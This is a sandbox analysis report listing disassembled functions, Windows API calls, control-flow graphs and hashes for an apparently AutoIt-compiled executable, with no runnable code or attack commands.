                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                              • String ID: This is a third-party compiled AutoIt script.$runas
                                                              • API String ID: 438480954-3287110873
                                                              • Opcode ID: 31dc113017f5b9658889008b13de911963d1452458df417c291581f6803e9ddb
                                                              • Instruction ID: 1bdb2637c70d6144abda39b842da4a25c62e98e4b59d67075db4e86b1497feef
                                                              • Opcode Fuzzy Hash: 31dc113017f5b9658889008b13de911963d1452458df417c291581f6803e9ddb
                                                              • Instruction Fuzzy Hash: B951D432A04248AACF11ABBCED42EED7BBDEB15740F0085A5F615671A3DE748A458731
                                                              Function 00ACDDC0 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1141 acddc0-acde4f call abd7f7 GetVersionExW call ab6a63 call acdfb4 call ab6571 1150 acde55-acde56 1141->1150 1151 b224c8-b224cb 1141->1151 1154 acde58-acde63 1150->1154 1155 acde92-acdea2 call acdf77 1150->1155 1152 b224e4-b224e8 1151->1152 1153 b224cd 1151->1153 1158 b224d3-b224dc 1152->1158 1159 b224ea-b224f3 1152->1159 1157 b224d0 1153->1157 1160 acde69-acde6b 1154->1160 1161 b2244e-b22454 1154->1161 1168 acdea4-acdec1 GetCurrentProcess call acdf5f 1155->1168 1169 acdec7-acdee1 1155->1169 1157->1158 1158->1152 1159->1157 1165 b224f5-b224f8 1159->1165 1166 b22469-b22475 1160->1166 1167 acde71-acde74 1160->1167 1163 b22456-b22459 1161->1163 1164 b2245e-b22464 1161->1164 1163->1155 1164->1155 1165->1158 1170 b22477-b2247a 1166->1170 1171 b2247f-b22485 1166->1171 1172 acde7a-acde89 1167->1172 1173 b22495-b22498 1167->1173 1168->1169 1192 acdec3 1168->1192 1175 acdf31-acdf3b GetSystemInfo 1169->1175 1176 acdee3-acdef7 call ace00c 1169->1176 1170->1155 1171->1155 1177 acde8f 1172->1177 1178 b2248a-b22490 1172->1178 1173->1155 1179 b2249e-b224b3 1173->1179 1181 acdf0e-acdf1a 1175->1181 1189 acdf29-acdf2f GetSystemInfo 1176->1189 1190 acdef9-acdf01 call acdff4 GetNativeSystemInfo 1176->1190 1177->1155 1178->1155 1183 b224b5-b224b8 1179->1183 1184 b224bd-b224c3 1179->1184 1185 acdf1c-acdf1f FreeLibrary 1181->1185 1186 acdf21-acdf26 1181->1186 1183->1155 1184->1155 1185->1186 1191 acdf03-acdf07 1189->1191 1190->1191 1191->1181 1194 acdf09-acdf0c FreeLibrary 1191->1194 1192->1169 1194->1181
                                                              APIs
                                                              • GetVersionExW.KERNEL32(?), ref: 00ACDDEC
                                                              • GetCurrentProcess.KERNEL32(00000000,00B4DC38,?,?), ref: 00ACDEAC
                                                              • GetNativeSystemInfo.KERNELBASE(?,00B4DC38,?,?), ref: 00ACDF01
                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 00ACDF0C
                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 00ACDF1F
                                                              • GetSystemInfo.KERNEL32(?,00B4DC38,?,?), ref: 00ACDF29
                                                              • GetSystemInfo.KERNEL32(?,00B4DC38,?,?), ref: 00ACDF35
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                              • String ID:
                                                              • API String ID: 3851250370-0
                                                              • Opcode ID: 61591a1250a54bb83b4587955d006abec8809866d82213302f2b627f2adcebf6
                                                              • Instruction ID: 02c67c9fa2f11ee0fbeec5ebddf349c603572fabc63f3fa8ce3aa796a29c2367
                                                              • Opcode Fuzzy Hash: 61591a1250a54bb83b4587955d006abec8809866d82213302f2b627f2adcebf6
                                                              • Instruction Fuzzy Hash: AF6192B180A394DBCF15DF6898C16EE7FB4AF29300B1A49EDD8499F207C634C949CB65
                                                              Function 00AB406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1213 ab406b-ab4083 CreateStreamOnHGlobal 1214 ab40a3-ab40a6 1213->1214 1215 ab4085-ab409c FindResourceExW 1213->1215 1216 b24f16-b24f25 LoadResource 1215->1216 1217 ab40a2 1215->1217 1216->1217 1218 b24f2b-b24f39 SizeofResource 1216->1218 1217->1214 1218->1217 1219 b24f3f-b24f4a LockResource 1218->1219 1219->1217 1220 b24f50-b24f6e 1219->1220 1220->1217
                                                              APIs
                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00AB449E,?,?,00000000,00000001), ref: 00AB407B
                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00AB449E,?,?,00000000,00000001), ref: 00AB4092
                                                              • LoadResource.KERNEL32(?,00000000,?,?,00AB449E,?,?,00000000,00000001,?,?,?,?,?,?,00AB41FB), ref: 00B24F1A
                                                              • SizeofResource.KERNEL32(?,00000000,?,?,00AB449E,?,?,00000000,00000001,?,?,?,?,?,?,00AB41FB), ref: 00B24F2F
                                                              • LockResource.KERNEL32(00AB449E,?,?,00AB449E,?,?,00000000,00000001,?,?,?,?,?,?,00AB41FB,00000000), ref: 00B24F42
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                              • String ID: SCRIPT
                                                              • API String ID: 3051347437-3967369404
                                                              • Opcode ID: a63be304345e6c76960396d65ed3765fc80894b93a31df9739318a5df6b7d615
                                                              • Instruction ID: 6963d87ce4ac5ea29b31a4a7681976fc8c29e77be98f891c85305f74200d462c
                                                              • Opcode Fuzzy Hash: a63be304345e6c76960396d65ed3765fc80894b93a31df9739318a5df6b7d615
                                                              • Instruction Fuzzy Hash: 18117970200741BFE7219B25EC48F6B7BBDEBC9B51F20816CF616972A1DB71DC008A21
                                                              Function 00AF6CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00B22F49), ref: 00AF6CB9
                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00AF6CCA
                                                              • FindClose.KERNEL32(00000000), ref: 00AF6CDA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: FileFind$AttributesCloseFirst
                                                              • String ID:
                                                              • API String ID: 48322524-0
                                                              • Opcode ID: d2866a62a7f2391d72d6dead103562a056bdb93147a900556c6ef76ee1c17548
                                                              • Instruction ID: 4ce58add10726f8e0fc20cc0b841e26b52f3dc0d8f59e72d13c44e3342f8930c
                                                              • Opcode Fuzzy Hash: d2866a62a7f2391d72d6dead103562a056bdb93147a900556c6ef76ee1c17548
                                                              • Instruction Fuzzy Hash: 72E0D8318148155782106778FC0D4FD776CDA05339F200705F5B1D21D0EB70DD1046D5
                                                              Function 00AC3B70 Relevance: 2.2, Strings: 1, Instructions: 903COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throwstd::exception::exception
                                                              • String ID: @
                                                              • API String ID: 3728558374-2766056989
                                                              • Opcode ID: 071482f827394284e0ade90c4dd436d58dfa4c1c9fd5fe7b4bd8b31ae2ff22d6
                                                              • Instruction ID: befc87e4db4377ce092f1fb2e21c9d3d637a6c0ff408c716700a27a5784344a1
                                                              • Opcode Fuzzy Hash: 071482f827394284e0ade90c4dd436d58dfa4c1c9fd5fe7b4bd8b31ae2ff22d6
                                                              • Instruction Fuzzy Hash: 9672BB31A042089FCF14DF98C581FAEB7B5EF48300F16C49EE90AAB251DB31AE45CB95
                                                              Function 00AC3200 Relevance: 1.0, Instructions: 986COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID:
                                                              • API String ID: 3964851224-0
                                                              • Opcode ID: 03a2cdb18218c987564fab511c3b7ffb8e9c712f533fc9e88a35ac2fec6ea9e5
                                                              • Instruction ID: 015567eaa4d7b7999cfd5b27fd7dc505ba744e67829cf7138bd291bc9903dbbe
                                                              • Opcode Fuzzy Hash: 03a2cdb18218c987564fab511c3b7ffb8e9c712f533fc9e88a35ac2fec6ea9e5
                                                              • Instruction Fuzzy Hash: FF9256716083419FDB24DF18C580F6ABBE1FF88304F15885DE99A8B262DB71ED45CB92
                                                              Function 00ABE8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ABE959
                                                              • timeGetTime.WINMM ref: 00ABEBFA
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ABED2E
                                                              • TranslateMessage.USER32(?), ref: 00ABED3F
                                                              • DispatchMessageW.USER32(?), ref: 00ABED4A
                                                              • LockWindowUpdate.USER32(00000000), ref: 00ABED79
                                                              • DestroyWindow.USER32 ref: 00ABED85
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00ABED9F
                                                              • Sleep.KERNEL32(0000000A), ref: 00B25270
                                                              • TranslateMessage.USER32(?), ref: 00B259F7
                                                              • DispatchMessageW.USER32(?), ref: 00B25A05
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B25A19
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                              • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                              • API String ID: 2641332412-570651680
                                                              • Opcode ID: 1ef5de0379e2dc19e4e98cb3aae1f9544fd17f536807dd9c98674e9025a965d6
                                                              • Instruction ID: b36c465e450cd3a3de6feb9f3c194415e1ec173851045dcf2eef7b81afd541be
                                                              • Opcode Fuzzy Hash: 1ef5de0379e2dc19e4e98cb3aae1f9544fd17f536807dd9c98674e9025a965d6
                                                              • Instruction Fuzzy Hash: 38628E705083409FDB24DF24D985BEA77E8FF44304F1449ADF98A9B292DB75D888CB62
                                                              Function 00AE5C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • ___createFile.LIBCMT ref: 00AE5EC3
                                                              • ___createFile.LIBCMT ref: 00AE5F04
                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00AE5F2D
                                                              • __dosmaperr.LIBCMT ref: 00AE5F34
                                                              • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00AE5F47
                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00AE5F6A
                                                              • __dosmaperr.LIBCMT ref: 00AE5F73
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00AE5F7C
                                                              • __set_osfhnd.LIBCMT ref: 00AE5FAC
                                                              • __lseeki64_nolock.LIBCMT ref: 00AE6016
                                                              • __close_nolock.LIBCMT ref: 00AE603C
                                                              • __chsize_nolock.LIBCMT ref: 00AE606C
                                                              • __lseeki64_nolock.LIBCMT ref: 00AE607E
                                                              • __lseeki64_nolock.LIBCMT ref: 00AE6176
                                                              • __lseeki64_nolock.LIBCMT ref: 00AE618B
                                                              • __close_nolock.LIBCMT ref: 00AE61EB
                                                                • Part of subcall function 00ADEA9C: CloseHandle.KERNELBASE(00000000,00B5EEF4,00000000,?,00AE6041,00B5EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00ADEAEC
                                                                • Part of subcall function 00ADEA9C: GetLastError.KERNEL32(?,00AE6041,00B5EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00ADEAF6
                                                                • Part of subcall function 00ADEA9C: __free_osfhnd.LIBCMT ref: 00ADEB03
                                                                • Part of subcall function 00ADEA9C: __dosmaperr.LIBCMT ref: 00ADEB25
                                                                • Part of subcall function 00AD7C0E: __getptd_noexit.LIBCMT ref: 00AD7C0E
                                                              • __lseeki64_nolock.LIBCMT ref: 00AE620D
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00AE6342
                                                              • ___createFile.LIBCMT ref: 00AE6361
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00AE636E
                                                              • __dosmaperr.LIBCMT ref: 00AE6375
                                                              • __free_osfhnd.LIBCMT ref: 00AE6395
                                                              • __invoke_watson.LIBCMT ref: 00AE63C3
                                                              • __wsopen_helper.LIBCMT ref: 00AE63DD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                              • String ID: @
                                                              • API String ID: 3896587723-2766056989
                                                              • Opcode ID: 82f82e3040c705047967daf8ae326fd2618b277e11cb62492d90057148ea5aa7
                                                              • Instruction ID: 7af8bb11d260bbba862651bf0c77cf93b9f59728a92ba6ca994fed566e1f68d5
                                                              • Opcode Fuzzy Hash: 82f82e3040c705047967daf8ae326fd2618b277e11cb62492d90057148ea5aa7
                                                              • Instruction Fuzzy Hash: 06225671D0068A9FEF299F6AEC85BFD7B31EB20368F244629E5229B2D1C7358D40C751
                                                              Function 00AFFA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • _wcscpy.LIBCMT ref: 00AFFA96
                                                              • _wcschr.LIBCMT ref: 00AFFAA4
                                                              • _wcscpy.LIBCMT ref: 00AFFABB
                                                              • _wcscat.LIBCMT ref: 00AFFACA
                                                              • _wcscat.LIBCMT ref: 00AFFAE8
                                                              • _wcscpy.LIBCMT ref: 00AFFB09
                                                              • __wsplitpath.LIBCMT ref: 00AFFBE6
                                                              • _wcscpy.LIBCMT ref: 00AFFC0B
                                                              • _wcscpy.LIBCMT ref: 00AFFC1D
                                                              • _wcscpy.LIBCMT ref: 00AFFC32
                                                              • _wcscat.LIBCMT ref: 00AFFC47
                                                              • _wcscat.LIBCMT ref: 00AFFC59
                                                              • _wcscat.LIBCMT ref: 00AFFC6E
                                                                • Part of subcall function 00AFBFA4: _wcscmp.LIBCMT ref: 00AFC03E
                                                                • Part of subcall function 00AFBFA4: __wsplitpath.LIBCMT ref: 00AFC083
                                                                • Part of subcall function 00AFBFA4: _wcscpy.LIBCMT ref: 00AFC096
                                                                • Part of subcall function 00AFBFA4: _wcscat.LIBCMT ref: 00AFC0A9
                                                                • Part of subcall function 00AFBFA4: __wsplitpath.LIBCMT ref: 00AFC0CE
                                                                • Part of subcall function 00AFBFA4: _wcscat.LIBCMT ref: 00AFC0E4
                                                                • Part of subcall function 00AFBFA4: _wcscat.LIBCMT ref: 00AFC0F7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                              • String ID: >>>AUTOIT SCRIPT<<<
                                                              • API String ID: 2955681530-2806939583
                                                              • Opcode ID: 9ddf7205b18a903e24049fad6a44d04c296e8b42afe98a80e033a1bed71ea542
                                                              • Instruction ID: 556b437034f517b07568586e4c1a28119ab9f1bbdce9cf3e2bdfa8369c4b6391
                                                              • Opcode Fuzzy Hash: 9ddf7205b18a903e24049fad6a44d04c296e8b42afe98a80e033a1bed71ea542
                                                              • Instruction Fuzzy Hash: 0091A4725043059FDB10EFA4C951FABB3E9BF44314F04486EFA999B292DB30EA44CB91
                                                              Function 00AFBFA4 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 316fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00AFBDB4: __time64.LIBCMT ref: 00AFBDBE
                                                                • Part of subcall function 00AB4517: _fseek.LIBCMT ref: 00AB452F
                                                              • __wsplitpath.LIBCMT ref: 00AFC083
                                                                • Part of subcall function 00AD1DFC: __wsplitpath_helper.LIBCMT ref: 00AD1E3C
                                                              • _wcscpy.LIBCMT ref: 00AFC096
                                                              • _wcscat.LIBCMT ref: 00AFC0A9
                                                              • __wsplitpath.LIBCMT ref: 00AFC0CE
                                                              • _wcscat.LIBCMT ref: 00AFC0E4
                                                              • _wcscat.LIBCMT ref: 00AFC0F7
                                                              • _wcscmp.LIBCMT ref: 00AFC03E
                                                                • Part of subcall function 00AFC56D: _wcscmp.LIBCMT ref: 00AFC65D
                                                                • Part of subcall function 00AFC56D: _wcscmp.LIBCMT ref: 00AFC670
                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00AFC2A1
                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00AFC338
                                                              • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00AFC34E
                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AFC35F
                                                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AFC371
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                              • String ID: p1Mw`KNw
                                                              • API String ID: 2378138488-3626030660
                                                              • Opcode ID: f7873c81ad062ae217758de928334c4934f2bee84fa76db906ac30c380fda36b
                                                              • Instruction ID: c7198f1a09e21a5c3a5e8885836acfc07c06c6193feb7516bb8955eacd1916ed
                                                              • Opcode Fuzzy Hash: f7873c81ad062ae217758de928334c4934f2bee84fa76db906ac30c380fda36b
                                                              • Instruction Fuzzy Hash: B5C129B190021DABDF15DFA5CE81EEEB7BDAF48310F0041AAF609E7152DB309A448F65
                                                              Function 00AB3F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00AB3F86
                                                              • RegisterClassExW.USER32(00000030), ref: 00AB3FB0
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AB3FC1
                                                              • InitCommonControlsEx.COMCTL32(?), ref: 00AB3FDE
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AB3FEE
                                                              • LoadIconW.USER32(000000A9), ref: 00AB4004
                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AB4013
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                              • API String ID: 2914291525-1005189915
                                                              • Opcode ID: 6d1f349577c1d4a817f7c398508bd73fa90160557559b0206625f6ecee67ebd8
                                                              • Instruction ID: eee9cf9a89c9f2358a3fd8a6f527f07c1a80670a12ff5fb7640e0b9e607727bc
                                                              • Opcode Fuzzy Hash: 6d1f349577c1d4a817f7c398508bd73fa90160557559b0206625f6ecee67ebd8
                                                              • Instruction Fuzzy Hash: 4721C4B5910318EFDB00DFA8EC89BCDBBB4FB08710F10461AF615A72A0DBB545849FA1
                                                              Function 00AB3742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
